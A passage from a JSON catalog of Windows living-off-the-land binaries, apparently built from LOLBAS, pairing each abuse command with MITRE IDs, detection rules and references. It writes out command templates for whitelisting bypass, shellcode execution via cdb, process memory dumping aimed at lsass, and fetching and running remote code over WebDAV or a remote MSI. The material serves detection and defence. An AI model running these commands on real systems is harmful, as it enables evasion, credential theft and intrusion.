bcp.exe"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_bcp_export_data.yml"}],"references":["https://docs.microsoft.com/en-us/sql/tools/bcp-utility","https://asec.ahnlab.com/en/61000/","https://asec.ahnlab.com/en/78944/","https://www.huntress.com/blog/attacking-mssql-servers","https://www.huntress.com/blog/attacking-mssql-servers-pt-ii","https://news.sophos.com/en-us/2024/08/07/sophos-mdr-hunt-tracks-mimic-ransomware-campaign-against-organizations-in-india/","https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bcp/"]},{"id":"lolbas:bginfo-exe:0","toolId":"lolbas:bginfo-exe","toolName":"Bginfo.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"bginfo.exe {PATH:.bgi} /popup /nolicprompt","description":"Execute VBscript code that is referenced within the specified .bgi file.","usecase":"Local execution of VBScript","mitre":["T1218"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/"]},{"id":"lolbas:bginfo-exe:1","toolId":"lolbas:bginfo-exe","toolName":"Bginfo.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"bginfo.exe {PATH:.bgi} /popup /nolicprompt","description":"Execute VBscript code that is referenced within the specified .bgi file.","usecase":"Local execution of VBScript","mitre":["T1218"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/"]},{"id":"lolbas:bginfo-exe:2","toolId":"lolbas:bginfo-exe","toolName":"Bginfo.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"\\\\10.10.10.10\\webdav\\bginfo.exe {PATH:.bgi} /popup /nolicprompt","description":"Execute bginfo.exe from a WebDAV server.","usecase":"Remote execution of VBScript","mitre":["T1218"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/"]},{"id":"lolbas:bginfo-exe:3","toolId":"lolbas:bginfo-exe","toolName":"Bginfo.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"\\\\10.10.10.10\\webdav\\bginfo.exe {PATH:.bgi} /popup /nolicprompt","description":"Execute bginfo.exe from a WebDAV server.","usecase":"Remote execution of VBScript","mitre":["T1218"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/"]},{"id":"lolbas:bginfo-exe:4","toolId":"lolbas:bginfo-exe","toolName":"Bginfo.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"\\\\live.sysinternals.com\\Tools\\bginfo.exe {PATH_SMB:.bgi} /popup /nolicprompt","description":"This style of execution may not longer work due to patch.","usecase":"Remote execution of VBScript","mitre":["T1218"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/"]},{"id":"lolbas:bginfo-exe:5","toolId":"lolbas:bginfo-exe","toolName":"Bginfo.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"\\\\live.sysinternals.com\\Tools\\bginfo.exe {PATH_SMB:.bgi} /popup /nolicprompt","description":"This style of execution may not longer work due to patch.","usecase":"Remote execution of VBScript","mitre":["T1218"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/"]},{"id":"lolbas:cdb-exe:0","toolId":"lolbas:cdb-exe","toolName":"Cdb.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"cdb.exe -cf {PATH:.wds} -o notepad.exe","description":"Launch 64-bit shellcode from the specified .wds file using cdb.exe.","usecase":"Local execution of assembly shellcode.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\cdb.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\cdb.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_cdb.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html","https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options","https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda","https://mrd0x.com/the-power-of-cdb-debugging-tool/","https://twitter.com/nas_bench/status/1534957360032120833","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/"]},{"id":"lolbas:cdb-exe:1","toolId":"lolbas:cdb-exe","toolName":"Cdb.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"cdb.exe -pd -pn {process_name}\n.shell {CMD}","description":"Attaching to any process and executing shell commands.","usecase":"Run a shell command under a trusted Microsoft signed binary","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\cdb.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\cdb.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_cdb.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html","https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options","https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda","https://mrd0x.com/the-power-of-cdb-debugging-tool/","https://twitter.com/nas_bench/status/1534957360032120833","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/"]},{"id":"lolbas:cdb-exe:2","toolId":"lolbas:cdb-exe","toolName":"Cdb.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"cdb.exe -c {PATH:.txt} \"{CMD}\"","description":"Execute arbitrary commands and binaries using a debugging script (see Resources section for a sample file).","usecase":"Run commands under a trusted Microsoft signed binary","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\cdb.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\cdb.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_cdb.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html","https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options","https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda","https://mrd0x.com/the-power-of-cdb-debugging-tool/","https://twitter.com/nas_bench/status/1534957360032120833","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/"]},{"id":"lolbas:coregen-exe:0","toolId":"lolbas:coregen-exe","toolName":"coregen.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"coregen.exe /L {PATH_ABSOLUTE:.dll} dummy_assembly_name","description":"Loads the target .DLL in arbitrary path specified with /L.","usecase":"Execute DLL code","mitre":["T1055"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe","C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/image_load/image_load_side_load_coregen.yml"},{"type":"IOC","value":"coregen.exe loading .dll file not in \"C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\\""},{"type":"IOC","value":"coregen.exe loading .dll file not named coreclr.dll"},{"type":"IOC","value":"coregen.exe command line containing -L or -l"},{"type":"IOC","value":"coregen.exe command line containing unexpected/invald assembly name"},{"type":"IOC","value":"coregen.exe application crash by invalid assembly name"}],"references":["https://www.youtube.com/watch?v=75XImxOOInU","https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/coregen/"]},{"id":"lolbas:coregen-exe:1","toolId":"lolbas:coregen-exe","toolName":"coregen.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"coregen.exe dummy_assembly_name","description":"Loads the coreclr.dll in the corgen.exe directory (e.g. C:\\Program Files\\Microsoft Silverlight\\5.1.50918.0).","usecase":"Execute DLL code","mitre":["T1055"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe","C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/image_load/image_load_side_load_coregen.yml"},{"type":"IOC","value":"coregen.exe loading .dll file not in \"C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\\""},{"type":"IOC","value":"coregen.exe loading .dll file not named coreclr.dll"},{"type":"IOC","value":"coregen.exe command line containing -L or -l"},{"type":"IOC","value":"coregen.exe command line containing unexpected/invald assembly name"},{"type":"IOC","value":"coregen.exe application crash by invalid assembly name"}],"references":["https://www.youtube.com/watch?v=75XImxOOInU","https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/coregen/"]},{"id":"lolbas:coregen-exe:2","toolId":"lolbas:coregen-exe","toolName":"coregen.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"coregen.exe /L {PATH_ABSOLUTE:.dll} dummy_assembly_name","description":"Loads the target .DLL in arbitrary path specified with /L. Since binary is signed it can also be used to bypass application whitelisting solutions.","usecase":"Execute DLL code","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe","C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/image_load/image_load_side_load_coregen.yml"},{"type":"IOC","value":"coregen.exe loading .dll file not in \"C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\\""},{"type":"IOC","value":"coregen.exe loading .dll file not named coreclr.dll"},{"type":"IOC","value":"coregen.exe command line containing -L or -l"},{"type":"IOC","value":"coregen.exe command line containing unexpected/invald assembly name"},{"type":"IOC","value":"coregen.exe application crash by invalid assembly name"}],"references":["https://www.youtube.com/watch?v=75XImxOOInU","https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/coregen/"]},{"id":"lolbas:createdump-exe:0","toolId":"lolbas:createdump-exe","toolName":"Createdump.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"createdump.exe -n -f {PATH:.dmp} {PID}","description":"Dump process by PID and create a minidump file. If \"-f dump.dmp\" is not specified, the file is created as '%TEMP%\\dump.%p.dmp' where %p is the PID of the target process.","usecase":"Dump process memory contents using PID.","mitre":["T1003"],"privilege":"system","fullPath":["C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\<version>\\createdump.exe","C:\\Program Files (x86)\\dotnet\\shared\\Microsoft.NETCore.App\\<version>\\createdump.exe","C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\dotnet\\runtime\\shared\\Microsoft.NETCore.App\\6.0.0\\createdump.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\dotnet\\runtime\\shared\\Microsoft.NETCore.App\\6.0.0\\createdump.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_renamed_createdump.yml"},{"type":"IOC","value":"createdump.exe process with a command line containing the lsass.exe process id"}],"references":["https://twitter.com/bopin2020/status/1366400799199272960","https://docs.microsoft.com/en-us/troubleshoot/developer/webapps/aspnetcore/practice-troubleshoot-linux/lab-1-3-capture-core-crash-dumps","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Createdump/"]},{"id":"lolbas:csi-exe:0","toolId":"lolbas:csi-exe","toolName":"csi.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"csi.exe {PATH:.cs}","description":"Use csi.exe to run unsigned C# code.","usecase":"Local execution of unsigned C# code.","mitre":["T1127"],"privilege":"user","fullPath":["c:\\Program Files (x86)\\Microsoft Visual Studio\\2017\\Community\\MSBuild\\15.0\\Bin\\Roslyn\\csi.exe","c:\\Program Files (x86)\\Microsoft Web Tools\\Packages\\Microsoft.Net.Compilers.X.Y.Z\\tools\\csi.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_csi_use_of_csharp_console.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://twitter.com/subTee/status/781208810723549188","https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/csi/"]},{"id":"lolbas:defaultpack-exe:0","toolId":"lolbas:defaultpack-exe","toolName":"DefaultPack.EXE","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"DefaultPack.EXE /C:\"{CMD}\"","description":"Use DefaultPack.EXE to execute arbitrary binaries, with added argument support.","usecase":"Can be used to execute stagers, binaries, and other malicious commands.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft\\DefaultPack\\DefaultPack.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_lolbin_defaultpack.yml"},{"type":"IOC","value":"DefaultPack.EXE spawned an unknown process"}],"references":["https://twitter.com/checkymander/status/1311509470275604480.","https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/"]},{"id":"lolbas:devinit-exe:0","toolId":"lolbas:devinit-exe","toolName":"Devinit.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"devinit.exe run -t msi-install -i {REMOTEURL:.msi}","description":"Downloads an MSI file to C:\\Windows\\Installer and then installs it.","usecase":"Executes code from a (remote) MSI file.","mitre":["T1218.007"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\Common7\\Tools\\devinit\\devinit.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\Common7\\Tools\\devinit\\devinit.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_devinit_lolbin_usage.yml"}],"references":["https://twitter.com/mrd0x/status/1460815932402679809","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/"]},{"id":"lolbas:devtoolslauncher-exe:0","toolId":"lolbas:devtoolslauncher-exe","toolName":"Devtoolslauncher.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"devtoolslauncher.exe LaunchForDeploy {PATH_ABSOLUTE:.exe} \"{CMD:args}\" test","description":"The above binary will execute other binary.","usecase":"Execute any binary with given arguments and it will call `developertoolssvc.exe`. `developertoolssvc` is actually executing the binary.","mitre":["T1127"],"privilege":"user","fullPath":["c:\\windows\\system32\\devtoolslauncher.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml"},{"type":"IOC","value":"DeveloperToolsSvc.exe spawned an unknown process"}],"references":["https://twitter.com/_felamos/status/1179811992841797632","https://www.virustotal.com/gui/file/84877a507af8b70c145777a87eaf28a8327c50a1563fe650f34572bef8a42ff6/details","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/"]},{"id":"lolbas:devtoolslauncher-exe:1","toolId":"lolbas:devtoolslauncher-exe","toolName":"Devtoolslauncher.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"devtoolslauncher.exe LaunchForDebug {PATH_ABSOLUTE:.exe} \"{CMD:args}\" test","description":"The above binary will execute other binary.","usecase":"Execute any binary with given arguments.","mitre":["T1127"],"privilege":"user","fullPath":["c:\\windows\\system32\\devtoolslauncher.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml"},{"type":"IOC","value":"DeveloperToolsSvc.exe spawned an unknown process"}],"references":["https://twitter.com/_felamos/status/1179811992841797632","https://www.virustotal.com/gui/file/84877a507af8b70c145777a87eaf28a8327c50a1563fe650f34572bef8a42ff6/details","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/"]},{"id":"lolbas:dnx-exe:0","toolId":"lolbas:dnx-exe","toolName":"dnx.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"dnx.exe {PATH_ABSOLUTE:folder}","description":"Execute C# code located in the specified folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies)","usecase":"Local execution of C# project stored in consoleapp folder.","mitre":["T1127"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dnx.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dnx/"]},{"id":"lolbas:dotnet-exe:0","toolId":"lolbas:dotnet-exe","toolName":"Dotnet.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"dotnet.exe {PATH:.dll}","description":"dotnet.exe will execute any DLL even if applocker is enabled.","usecase":"Execute code bypassing AWL","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\dotnet\\dotnet.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dotnet.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"dotnet.exe spawned an unknown process"}],"references":["https://twitter.com/_felamos/status/1204705548668555264","https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc","https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/","https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/"]},{"id":"lolbas:dotnet-exe:1","toolId":"lolbas:dotnet-exe","toolName":"Dotnet.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"dotnet.exe {PATH:.dll}","description":"dotnet.exe will execute any DLL.","usecase":"Execute DLL","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\dotnet\\dotnet.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dotnet.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"dotnet.exe spawned an unknown process"}],"references":["https://twitter.com/_felamos/status/1204705548668555264","https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc","https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/","https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/"]},{"id":"lolbas:dotnet-exe:2","toolId":"lolbas:dotnet-exe","toolName":"Dotnet.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"dotnet.exe fsi","description":"dotnet.exe will open a console which allows for the execution of arbitrary F# commands","usecase":"Execute arbitrary F# code","mitre":["T1059"],"privilege":"user","fullPath":["C:\\Program 